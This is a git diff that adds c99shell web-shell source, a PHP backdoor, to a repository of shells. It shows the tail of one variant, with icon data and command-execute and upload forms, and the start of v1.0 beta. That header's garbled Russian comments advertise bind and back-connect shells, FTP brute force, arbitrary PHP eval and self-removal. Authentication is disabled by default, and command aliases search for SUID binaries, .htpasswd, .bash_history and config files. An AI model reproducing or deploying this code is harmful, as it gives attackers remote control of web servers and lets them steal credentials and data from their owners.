+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_sys"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ".
+"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ".
+"/aZBVOqkpUa/4KisRC6rEgA7",
+"ext_tar"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+"u4tLAgEAOw==",
+"ext_theme"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAAD/AAAA/wCAAAAA".
+"gAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_txt"=>
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+"ext_url"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7".
+"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk".
+"fRQRADs=",
+"ext_vbe"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMAAAP8AAAAAAAAAAAADRii63CEgxibH".
+"kwDWEK3OACF6nDdhngWYoEgEMLde4IbS7SjPX93JrIwiIJrxTqTfERJUHTODgSAQ3QVjsZsgyu16".
+"seAwLAEAOw==",
+"ext_vbs"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAICAgMDAwAD//wCAgAAAAAAAAAAAAANQ".
+"GLrcECXGJsWTJYyybbTQVBAkCBSgyKGPl2YjCcwnG2qrV13TQBI6GwbXqb0yCgCJJYSZOK4LZPDY".
+"DHSvgEAQAGxrzQKNhgFtz+j0eM2eJQAAOw==",
+"ext_vcf"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwICAAP//AAAA/4CAgIAAAAAAgP//".
+"//8AAAAAAAAAAAAAAAAAAAAAAAAAAARYUElAK5VY2X0xp0LRTVYQAMWZaZWJAMJImiYVhEVmu7W4".
+"srfeSUAUeFI10GBJ1JhEHcEgNiidDIaEQjqtAgiEjQFQXcK+4HS4DPKADwey3PjzSGH1VTsTAQA7",
+"ext_wav"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_wma"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_wmf"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7",
+"ext_xsl"=>
+"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAAAPHx8f///4aGhoCAAP//ADNmmabK8AAA".
+"gAAAmQCAgDP//zNm/zOZ/8DAwDOZAAAA/zPM/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAV3oDSMZDlKqBgIa8sKzpAOr9s6gqzWPOADItZhpVAwhCvgIHBICBSCRQMh".
+"SAyVTZZiEXkgVlYl08loPCBUa0ApIBBWiDhSAHQXfLZavcAnABQGgYFJBHwDAAV+eWt2AAOJAIKD".
+"dBKFfQABi0AAfoeZPEkSP6OkPyEAOw=="
+);
+$imgequals = array(
+"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"),
+"ext_htaccess"=>array("ext_htaccess","ext_htpasswd")
+);
+ ksort($arrimg);
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v)
+  {
+   if (in_array($img,$v)) {$img = $k;}
+  }
+  if (empty($arrimg[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($arrimg[$img]);
+ }
+ else
+ {
+  echo  "<center>";
+  $k = array_keys($arrimg);
+  foreach ($k as $u)
+  {
+   echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";
+  }
+  echo "</center>";
+ }
+ exit;
+}
+if ($act == "about")
+{
+ $dàta = "Any stupid copyrights and copylefts";
+ echo $data;
+}
+
+$microtime = round(getmicrotime()-$starttime,4);
+?>
+</td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd"><b>Command execute</b></a> ::</b></p></td></tr>
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($aliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute"></form></td></tr>
+</TABLE>
+<br>
+<a bookmark="minipanel">
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=search"><b>Search</b></a> ::</b><form method="POST"><input type="hidden" name="act" value="search"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type="submit" name="submit" value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><p align="center"><b>:: <a href="<? echo $surl; ?>act=upload&d=<? echo $ud; ?>"><b>Upload</b></a> ::</b><br><form method="POST" ENCTYPE="multipart/form-data"><input type="hidden" name="act" value="upload"><input type="file" name="uploadfile"><input type="hidden" name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"></font><center><? echo $wdt; ?></center></form></p></td>
+</tr>
+</table><br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><p align="center"><b>:: Make Dir ::</b></p><p align="center"><form method="POST"><input type="hidden" name="act" value="mkdir"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type="submit" value="Create"><center><? echo $wdt; ?></center></form></p></td><td width="50%" height="1" valign="top"><p align="center"><b>:: Make File ::</b></p><center><form method="POST"><input type="hidden" name="act" value="mkfile"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type="submit" value="Create"><center><? echo $wdt; ?></form></center></td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> &copy; powered <a href="<?php echo $surl; ?>act=about"><u><b>by</b></u></a> Captain Crunch Security Team | <a href="http://ccteam.ru"><font color="#FF0000">http://ccteam.ru</font></a><font color="#FF0000"></font> | Generation time: <?php echo $microtime; ?> ]--</b></p></td></tr></table></body></html><?php chdir($lastdir); ?>
+
+
diff --git a/138shell/C/c99.txt b/138shell/C/c99.txt
new file mode 100644
index 0000000..8cdb4af
--- /dev/null
+++ b/138shell/C/c99.txt
@@ -0,0 +1,2927 @@
+<?php
+/*
+******************************************************************************************************
+*
+*					c99shell.php v.1.0 beta (îò 21.05.2005)
+*							Freeware license.
+*								© SpyGrup.Org.
+*  c99shell - ôàéë-ìåíåäæåğ ÷åğåç www-áğîóçåğ, "çàòî÷åíûé" äëÿ âçëîìà.
+*  Âû ìîæåòå áåñïëàòíî ñêà÷àòü ïîñëåäíşş âåğñèş íà äîìàøíåé ñòğàíè÷êå ïğîäóêòà:
+   http://ccteam.ru/releases/c99shell
+*
+*  Admin@SpyGrup.Org [Kruis]
+*  YaduriS@SpyGrup.Org [YaduriS]
+* 
+*  Îñîáåííîñòè:
+*  + óïğàâëåíèå ëîêàëüíûìè è óäàëåííûìè (ftp, samba *) ôàéëàìè/ïàïêàìè, ñîğòèğîâêà
+*    çàêà÷èâàíèå ñêà÷èâàíèå ôàéëîâ è ïàïîê
+*    (ïğåäâîğèòåëüíî óïàêîâûâàåòñÿ/ğàñïàêîâûâàåòñÿ ÷åğåç tar *)
+*    ïğîäâèíóòûé ïîèñê (âîçìîæåí âíóòğè ôàéëîâ)
+*    modify-time è access-time ó ôàéëîâ íå ìåíÿşòñÿ ïğè ğåäàêòèğîâàíèè (âûêë./âêë. ïàğàìåòğîì $filestealth)
+*  + ïğîäâèíóòûé SQL-ìåíåäæåğ íå óñòóïàşùèé phpmyadmin,
+     ïğîñìîòğ/ñîçäàíèå/ğåäàêòèğîâàíèå ÁÄ/òàáëèö, ïğîñìîòğ ôàéëîâ ÷åğåç áğåøü â mysql
+*  + óïğàâëåíèå ïğîöåññàìè unix-ìàøèíû.
+*  + óäîáíîå (èíîãäà ãğàôè÷åñêîå) âûïîëíåíèå shell-êîìàíä (ìíîãî àëèàñîâ, ìîæíî ğåäàêòèğîâàòü)
+*  + âûïîëíåíèå ïğîèçâîëüíîãî PHP-êîäà
+*  + êîäèğîâùèê äàííûõ ÷åğåç md5, unix-md5, sha1, crc32, base64
+*  + áûñòğûé ëîêàëüíûé àíàëèç áåçîïàñíîñòè ÎÑ
+*  + áûñòğîå ftp-ñêàíèğîâàíèå íà ñâÿçêè login;login èç /etc/passwd (îáû÷íî äàåò äîñòóï ê 1/100 àêêàóíòîâ)
+*    ïîñòğàíè÷íûé âûâîä, ñîğòèğîâêà, ãğóïïîâûå îïåğàöèè íàä ÁÄ/òàáëèöàìè, óïğàâëåíèå ïğîöåññàìè SQL)
+*  + ñêğèïò "ëşáèò" include: àâòîìàòè÷åñêè èùåò ïåğåìåííûå ñ äåñêğèïòîğàìè è âñòàâëÿåò èõ â ññûëêè (îïöèàëüíî)
+     òàêæå ìîæíî èçìåíèòü $surl (áàçîâàÿ ññûëêà) êàê ÷åğåç êîíôèãóğàöèş (ïğèíóäèòåëüíî) òàê è ÷åğåç cookie "c99sh_surl",
+     èäåò àâòî-çàïèñü çíà÷åíèÿ $set_surl â cookie "set_surl"
+*  + âîçìîæíîñòü "çàáèíäèòü" /bin/bash íà îïğåäåëåííûé ïîğò ñ ïğîèçâîëüíûì ïàğîëåì,
+*    èëè ñäåëàòü back connect (ïğîèçâîäèòñÿ òåñòèğîâàíèå ñîåäåíåíèÿ, è âûâîäÿòñÿ ïàğàìåòğû äëÿ çàïóñêà NetCat).
+*  + âîçìîæíîñòü áûñòğîãî ñàìî-óäàëåíèÿ ñêğèïòà
+*  + àâòîìàòèçèğîâàíàÿ îòïğàâêà ñîîáùåíèé î íåäîğàáîòêàõ è ïîæåëàíèé àâòîğó (÷åğåç mail())
+
+*  * - óñïåõ ïîëíîñòüş çàâèñèò îò êîíôèãóğàöèè PHP
+*
+*	 îáùåì íóæíî óâèäåòü âñ¸ ıòî!
+*
+*   Îæèäàåìûå èçìåíåíèÿ:
+*  ~ Ğàçâèòèå sql-ìåíåäæåğà
+*  ~ Äîáàâëåíèå íåäîñòàşùèõ ğàñøèğåíèé ôàéëîâ
+*
+*  ~-~ Ïèøèòå îáî âñåõ íàéäåíûõ íåäîğàáîòêàõ, æåëàåìûõ èçìåíåíèÿõ è äîğàáîòêàõ (äàæå î ñàìûõ íåçíà÷èòåëüíûõ!)
+       â ICQ UIN #656555 ëèáî ÷åğåç ğàçäåë "feedback", áóäóò ğàññìîòğåíû âñå ïğåäëîæåíèÿ è ïîæåëàíèÿ.
+*
+*  Last modify: 21.05.2005
+*
+*  © SpyGrup.Org
+*
+******************************************************************************************************
+*/
+
+//Starting calls
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+@set_time_limit(0);
+$win = strtolower(substr(PHP_OS, 0, 3)) == "win";
+if (!@ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
+define("starttime",getmicrotime());
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+
+$shver = "1.0 beta (21.05.2005)"; //Current version
+//CONFIGURATION AND SETTINGS
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
+else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
+}
+
+$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL.
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; //Self url
+}
+$surl = htmlspecialchars($surl);
+
+$timelimit = 60; //limit of execution this script (seconds), 0 = unlimited.
+
+//Authentication
+
+$login = "c99"; //login
+//DON'T FORGOT ABOUT CHANGE PASSWORD!!!
+$pass = "c99"; //password
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
+
+	/*COMMENT IT FOR TURN ON AUTHENTIFICATION >>>*/	$login = false; //turn off authentification
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
+$login_txt = "Restricted area"; //http-auth message.
+$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";
+
+$autoupdate = false; //Automatic updating?
+$updatenow = false; //If true, update now
+$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/"; //Update server
+
+$filestealth = false; //if true, don't change modify&access-time
+
+$donated_html = "<center><b>SpyGrup.Org-[Kruis & YaduriS]</b></center>";
+		/* If you publish free shell and you wish
+		add link to your site or any other information,
+		put here your html. */
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
+
+$curdir = "./"; //start directory
+//$curdir = getenv("DOCUMENT_ROOT");
+$tmpdir = ""; //Directory for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
+
+$log_email = "user@host.tld"; //Default e-mail for sending logs
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
+$sort_save = true; //If true then save sorting-type.
+
+// Registered file-types.
+//  array(
+//   "{action1}"=>array("ext1","ext2","ext3",...),
+//   "{action2}"=>array("ext4","ext5","ext6",...),
+//   ...
+//  )
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+// Registered executable file-types.
+//  array(
+//   string "command{i}"=>array("ext1","ext2","ext3",...),
+//   ...
+//  )
+//   {command}: %f% = filename
+$exeftypes  = array(
+ getenv("PHPRC")." %f%"=>array("php","php3","php4"),
+);
+
+/* Highlighted files.
+  array(
+   i=>array({regexp},{type},{opentag},{closetag},{break})
+   ...
+  )
+  string {regexp} - regular exp.
+  int {type}:
+	0 - files and folders (as default),
+	1 - files only, 2 - folders only
+  string {opentag} - open html-tag, e.g. "<b>" (default)
+  string {closetag} - close html-tag, e.g. "</b>" (default)
+  bool {break} - if true and found match then break
+*/
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
+  array("config.php",1) // example
+);
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
+									 // array (i=>{letter} ...); string {letter} - letter of a drive
+									// Set as false or for turn off.
+$hexdump_lines = 8;	// lines in hex preview file
+$hexdump_rows = 24;	// 16, 24 or 32 bytes in one line
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+$bindport_pass = "c99";	  // default password for binding
+$bindport_port = "11457"; // default port for binding
+
+// Command-aliases
+if (!$win)
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "ls -la"),
+  array("find all suid files", "find / -type f -perm -04000 -ls"),
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
+  array("find all sgid files", "find / -type f -perm -02000 -ls"),
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
+  array("find config.inc.php files", "find / -type f -name config.inc.php"),
+  array("find config* files", "find / -type f -name \"config*\""),
+  array("find config* files in current dir", "find . -type f -name \"config*\""),
+  array("find all writable directories and files", "find / -perm -2 -ls"),
+  array("find all writable directories and files in current dir", "find . -perm -2 -ls"),
+  array("find all service.pwd files", "find / -type f -name service.pwd"),
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"),
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
+  array("find all .bash_history files", "find / -type f -name .bash_history"),
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
+  array("list file attributes on a Linux second extended file system", "lsattr -va"),
+  array("show opened ports", "netstat -an | grep -i listen")
+ );
+}
+else
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "dir"),
+  array("show opened ports", "netstat -an")
+ );
+}
+
+$sess_cookie = "c99shvars"; // Cookie-variable name
+
+$usefsbuff = true; //Buffer-function
+$copy_unset = false; //Remove copied files from buffer after pasting
+
+//Quick launch
+$quicklaunch = array(
+ array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
+ array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
+ array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
+ array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
+ array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
+ array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
+ array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
+ array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
+ array("<b>Bind</b>",$surl."act=bind&d=%d"),
+ array("<b>Proc.</b>",$surl."act=ps_aux&d=%d"),
+ array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
+ array("<b>Sec.</b>",$surl."act=security&d=%d"),
+ array("<b>SQL</b>",$surl."act=sql&d=%d"),
+ array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
+ array("<b>Feedback</b>",$surl."act=feedback&d=%d"),
+ array("<b>Self remove</b>",$surl."act=selfremove"),
+ array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
+);
+
+//Highlight-code colors
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+
+//END CONFIGURATION
+
+
+// 				\/	Next code isn't for editing	\/
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
+if ($login)
+{
+ if(empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login ) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+  if ($login_txt === false) {$login_txt = "";}
+  elseif (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
+  exit($accessdeniedmess);
+ }
+}
+if ($act != "img")
+{
+$lastdir = realpath(".");
+chdir($curdir);
+if (($selfwrite) or ($updatenow))
+{
+ if ($selfwrite == "1") {$selfwrite = "c99shell.php";}
+ c99sh_getupdate();
+ $data = file_get_contents($c99sh_updatefurl);
+ $fp = fopen($data,"w");
+ fwrite($fp,$data);
+ fclose($fp);
+ exit;
+}
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+if (!function_exists("c99_buff_prepare"))
+{
+function c99_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c99_buff_prepare();
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c99_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len) 
+ {
+  $len = ceil($len/2) - 2;
